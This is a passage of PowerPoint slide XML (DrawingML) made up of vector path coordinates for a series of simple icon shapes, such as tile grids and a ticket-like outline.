                  <a:pt x="17673" y="10947"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="17102" y="11278"/>
                  <a:pt x="16691" y="12157"/>
                  <a:pt x="16691" y="13200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="14244"/>
                  <a:pt x="17102" y="15122"/>
                  <a:pt x="17673" y="15453"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17673" y="18000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="18000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="15453"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1552" y="15122"/>
                  <a:pt x="1964" y="14244"/>
                  <a:pt x="1964" y="13200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1964" y="12157"/>
                  <a:pt x="1552" y="11278"/>
                  <a:pt x="982" y="10947"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="982" y="8400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17673" y="8400"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="8400"/>
                  <a:pt x="17673" y="10947"/>
                  <a:pt x="17673" y="10947"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17673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673" y="19200"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="19200"/>
                  <a:pt x="17673" y="20400"/>
                  <a:pt x="17673" y="20400"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15709" y="20400"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="982" y="20400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="19200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15709" y="19200"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="19200"/>
                  <a:pt x="15709" y="20400"/>
                  <a:pt x="15709" y="20400"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="982" y="6000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15709" y="6000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15709" y="7200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="7200"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="7200"/>
                  <a:pt x="982" y="6000"/>
                  <a:pt x="982" y="6000"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17673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11400"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="11732"/>
                  <a:pt x="220" y="12000"/>
                  <a:pt x="491" y="12000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="762" y="12000"/>
                  <a:pt x="982" y="12538"/>
                  <a:pt x="982" y="13200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="13862"/>
                  <a:pt x="762" y="14400"/>
                  <a:pt x="491" y="14400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="220" y="14400"/>
                  <a:pt x="0" y="14668"/>
                  <a:pt x="0" y="15000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17673" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18214" y="21600"/>
                  <a:pt x="18655" y="21063"/>
                  <a:pt x="18655" y="20400"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18655" y="15000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="14668"/>
                  <a:pt x="18435" y="14400"/>
                  <a:pt x="18164" y="14400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17892" y="14400"/>
                  <a:pt x="17673" y="13862"/>
                  <a:pt x="17673" y="13200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="12538"/>
                  <a:pt x="17892" y="12000"/>
                  <a:pt x="18164" y="12000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18435" y="12000"/>
                  <a:pt x="18655" y="11732"/>
                  <a:pt x="18655" y="11400"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18655" y="6000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="5338"/>
                  <a:pt x="18214" y="4800"/>
                  <a:pt x="17673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6" name="Shape 2736"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5146947" y="501579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7" name="Shape 2737"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208" y="5015799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8" name="Shape 2738"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859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39" name="Shape 2739"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120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0" name="Shape 2740"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947381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945"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18655" y="2945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2945"/>
                  <a:pt x="12273" y="2945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2945"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9327" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9327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0309" y="10309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1" name="Shape 2741"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642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9327" y="9327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2945" y="9327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2945" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9327" y="2945"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9327" y="2945"/>
                  <a:pt x="9327" y="9327"/>
                  <a:pt x="9327" y="9327"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10309" y="1964"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1964" y="1964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1964" y="10309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10309" y="10309"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10309" y="10309"/>
                  <a:pt x="10309" y="1964"/>
                  <a:pt x="10309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2" name="Shape 2742"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903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12273" y="9327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12273" y="9327"/>
                  <a:pt x="12273" y="2945"/>
                  <a:pt x="12273" y="2945"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11291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1291" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11291" y="1964"/>
                  <a:pt x="11291" y="10309"/>
                  <a:pt x="11291" y="10309"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2945" y="2945"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9327" y="2945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2945"/>
                  <a:pt x="2945" y="2945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964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1964" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1964" y="1964"/>
                  <a:pt x="1964" y="19636"/>
                  <a:pt x="1964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3" name="Shape 2743"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164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12273"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18655" y="12273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18655" y="18655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12273" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12273" y="18655"/>
                  <a:pt x="12273" y="12273"/>
                  <a:pt x="12273" y="12273"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11291" y="19636"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19636" y="19636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19636" y="11291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11291" y="11291"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11291" y="11291"/>
                  <a:pt x="11291" y="19636"/>
                  <a:pt x="11291" y="19636"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2945" y="2945"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18655" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18655" y="9327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2945" y="9327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="9327"/>
                  <a:pt x="2945" y="2945"/>
                  <a:pt x="2945" y="2945"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1964" y="10309"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19636" y="10309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19636" y="1964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1964" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1964" y="1964"/>
                  <a:pt x="1964" y="10309"/>
                  <a:pt x="1964" y="10309"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2945" y="12273"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9327" y="12273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9327" y="18655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2945" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="18655"/>
                  <a:pt x="2945" y="12273"/>
                  <a:pt x="2945" y="12273"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1964" y="19636"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10309" y="19636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10309" y="11291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1964" y="11291"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1964" y="11291"/>
                  <a:pt x="1964" y="19636"/>
                  <a:pt x="1964" y="19636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4" name="Shape 2744"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425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9327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12273" y="9327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12273" y="12273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9327" y="12273"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9327" y="12273"/>
                  <a:pt x="9327" y="9327"/>
                  <a:pt x="9327" y="9327"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8345" y="13255"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13255" y="13255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13255" y="8345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8345" y="8345"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8345" y="8345"/>
                  <a:pt x="8345" y="13255"/>
                  <a:pt x="8345" y="13255"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9327" y="15709"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12273" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12273" y="18655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9327" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9327" y="18655"/>
                  <a:pt x="9327" y="15709"/>
                  <a:pt x="9327" y="15709"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8345" y="19636"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13255" y="19636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13255" y="14727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8345" y="14727"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8345" y="14727"/>
                  <a:pt x="8345" y="19636"/>
                  <a:pt x="8345" y="19636"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15709" y="2945"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18655" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18655" y="5891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15709" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="5891"/>
                  <a:pt x="15709" y="2945"/>
                  <a:pt x="15709" y="2945"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14727" y="6873"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19636" y="6873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19636" y="1964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14727" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="1964"/>
                  <a:pt x="14727" y="6873"/>
                  <a:pt x="14727" y="6873"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15709" y="9327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18655" y="9327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18655" y="12273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15709" y="12273"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="12273"/>
                  <a:pt x="15709" y="9327"/>
                  <a:pt x="15709" y="9327"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14727" y="13255"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19636" y="13255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19636" y="8345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14727" y="8345"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="8345"/>
                  <a:pt x="14727" y="13255"/>
                  <a:pt x="14727" y="13255"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9327" y="2945"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12273" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12273" y="5891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9327" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9327" y="5891"/>
                  <a:pt x="9327" y="2945"/>
                  <a:pt x="9327" y="2945"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8345" y="6873"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13255" y="6873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13255" y="1964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8345" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8345" y="1964"/>
                  <a:pt x="8345" y="6873"/>
                  <a:pt x="8345" y="6873"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2945" y="9327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5891" y="9327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5891" y="12273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2945" y="12273"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="12273"/>
                  <a:pt x="2945" y="9327"/>
                  <a:pt x="2945" y="9327"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1964" y="13255"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6873" y="13255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6873" y="8345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1964" y="8345"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1964" y="8345"/>
                  <a:pt x="1964" y="13255"/>
                  <a:pt x="1964" y="13255"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2945" y="2945"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5891" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5891" y="5891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2945" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="5891"/>
                  <a:pt x="2945" y="2945"/>
                  <a:pt x="2945" y="2945"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1964" y="6873"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6873" y="6873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6873" y="1964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1964" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1964" y="1964"/>
                  <a:pt x="1964" y="6873"/>
                  <a:pt x="1964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945" y="15709"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5891" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5891" y="18655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2945" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="18655"/>
                  <a:pt x="2945" y="15709"/>
                  <a:pt x="2945" y="15709"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1964" y="19636"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6873" y="19636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6873" y="14727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1964" y="14727"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1964" y="14727"/>
                  <a:pt x="1964" y="19636"/>
                  <a:pt x="1964" y="19636"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15709" y="15709"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18655" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18655" y="18655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15709" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="18655"/>
                  <a:pt x="15709" y="15709"/>
                  <a:pt x="15709" y="15709"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14727" y="19636"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19636" y="19636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19636" y="14727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14727" y="14727"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="14727"/>
                  <a:pt x="14727" y="19636"/>
                  <a:pt x="14727" y="1963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5" name="Shape 2745"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613686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3745" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13204" y="20618"/>
                  <a:pt x="12764" y="20178"/>
                  <a:pt x="12764" y="19636"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12764" y="13745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="13204"/>
                  <a:pt x="13204" y="12764"/>
                  <a:pt x="13745" y="12764"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19636" y="12764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20178" y="12764"/>
                  <a:pt x="20618" y="13204"/>
                  <a:pt x="20618" y="13745"/>
                </a:cubicBez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11782"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13745" y="11782"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12661" y="11782"/>
                  <a:pt x="11782" y="12661"/>
                  <a:pt x="11782" y="13745"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11782" y="19636"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="20721"/>
                  <a:pt x="12661" y="21600"/>
                  <a:pt x="13745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3745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="12661"/>
                  <a:pt x="20721" y="11782"/>
                  <a:pt x="19636" y="11782"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="20618" y="7855"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="8396"/>
                  <a:pt x="20178" y="8836"/>
                  <a:pt x="19636" y="8836"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13745" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13204" y="8836"/>
                  <a:pt x="12764" y="8396"/>
                  <a:pt x="12764" y="7855"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12764" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="1422"/>
                  <a:pt x="13204" y="982"/>
                  <a:pt x="13745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7855"/>
                  <a:pt x="20618" y="7855"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19636" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13745" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12661" y="0"/>
                  <a:pt x="11782" y="879"/>
                  <a:pt x="11782" y="1964"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11782" y="7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="8939"/>
                  <a:pt x="12661" y="9818"/>
                  <a:pt x="13745" y="9818"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19636" y="9818"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20721" y="9818"/>
                  <a:pt x="21600" y="8939"/>
                  <a:pt x="21600" y="7855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8836" y="7855"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="8396"/>
                  <a:pt x="8396" y="8836"/>
                  <a:pt x="7855" y="8836"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1964" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1421" y="8836"/>
                  <a:pt x="982" y="8396"/>
                  <a:pt x="982" y="7855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7855" y="982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8396" y="982"/>
                  <a:pt x="8836" y="1422"/>
                  <a:pt x="8836" y="1964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="1964"/>
                  <a:pt x="8836" y="7855"/>
                  <a:pt x="8836" y="7855"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7855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7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="8939"/>
                  <a:pt x="879" y="9818"/>
                  <a:pt x="1964" y="9818"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7855" y="9818"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8939" y="9818"/>
                  <a:pt x="9818" y="8939"/>
                  <a:pt x="9818" y="7855"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9818" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="879"/>
                  <a:pt x="8939" y="0"/>
                  <a:pt x="7855" y="0"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="8836" y="19636"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="20178"/>
                  <a:pt x="8396" y="20618"/>
                  <a:pt x="7855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3745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="13204"/>
                  <a:pt x="1421" y="12764"/>
                  <a:pt x="1964" y="12764"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7855" y="12764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8396" y="12764"/>
                  <a:pt x="8836" y="13204"/>
                  <a:pt x="8836" y="13745"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="13745"/>
                  <a:pt x="8836" y="19636"/>
                  <a:pt x="8836" y="19636"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7855" y="11782"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1964" y="11782"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="879" y="11782"/>
                  <a:pt x="0" y="12661"/>
                  <a:pt x="0" y="1374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7855" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8939" y="21600"/>
                  <a:pt x="9818" y="20721"/>
                  <a:pt x="9818" y="19636"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9818" y="13745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="12661"/>
                  <a:pt x="8939" y="11782"/>
                  <a:pt x="785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6" name="Shape 2746"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5146947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764"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16691" y="12764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16691" y="8836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20618" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="8836"/>
                  <a:pt x="20618" y="12764"/>
                  <a:pt x="20618" y="12764"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20618" y="7855"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16691" y="7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16149" y="7855"/>
                  <a:pt x="15709" y="8295"/>
                  <a:pt x="15709" y="8836"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15709" y="12764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="13305"/>
                  <a:pt x="16149" y="13745"/>
                  <a:pt x="16691" y="13745"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20618" y="13745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21160" y="13745"/>
                  <a:pt x="21600" y="13305"/>
                  <a:pt x="21600" y="12764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12764" y="20618"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8836" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8836" y="16691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12764" y="16691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="16691"/>
                  <a:pt x="12764" y="20618"/>
                  <a:pt x="12764" y="20618"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12764" y="15709"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8836" y="15709"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8295" y="15709"/>
                  <a:pt x="7855" y="16149"/>
                  <a:pt x="7855" y="16691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12764" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13305" y="21600"/>
                  <a:pt x="13745" y="21160"/>
                  <a:pt x="13745" y="20618"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13745" y="16691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="16149"/>
                  <a:pt x="13305" y="15709"/>
                  <a:pt x="12764" y="15709"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="12764" y="12764"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8836" y="12764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8836" y="8836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12764" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="8836"/>
                  <a:pt x="12764" y="12764"/>
                  <a:pt x="12764" y="12764"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12764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12764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7855" y="13305"/>
                  <a:pt x="8295" y="13745"/>
                  <a:pt x="8836" y="13745"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12764" y="13745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13305" y="13745"/>
                  <a:pt x="13745" y="13305"/>
                  <a:pt x="13745" y="12764"/>
